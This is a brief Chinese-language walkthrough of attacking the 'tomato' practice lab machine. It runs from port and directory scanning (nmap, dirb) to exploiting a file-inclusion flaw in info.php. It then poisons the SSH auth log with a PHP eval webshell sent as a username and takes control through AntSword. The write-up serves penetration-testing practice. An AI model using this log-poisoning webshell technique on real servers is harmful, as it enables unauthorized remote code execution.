tomato-靶机
一、安装靶机环境
下载双击.ova文件,写文件名路径导入
打开虚拟机用NAT模式
编辑–>虚拟网络编辑器查看IP段
二、信息收集
1.御剑端口扫描查找该虚拟机的IP
访问网站
扫目录
dirb http://192.168.30.130
收集到目录
/server-status
/antibot_image/
/index.html
访问/antibot_image目录
在目录下找到info.php
查到
根目录:/var/www/html
用户名:webmaster@localhost
查看info.php源代码,提示image参数用于文件包含
三、漏洞渗透
写image参数=linux的系统文件,发现成功显示,确定有文件包含漏洞
2.发现端口没有全部扫描出来,使用这个命令扫描
nmap -A 192.168.30.130 -p-
2211是ssl的连接端口
ssh '<?php @eval($_POST['cmd']);?>'@192.168.30.130 -p 2211
然后在网页端查看ubuntu报错信息:/var/log/auth.log
http://192.168.30.130/antibot_image/antibots/info.php?image=/var/log/auth.log
看到注入成功,然后用蚁剑
URL地址
http://192.168.30.130/antibot_image/antibots/info.php?image=/var/log/auth.log
然后就可以控制整个文件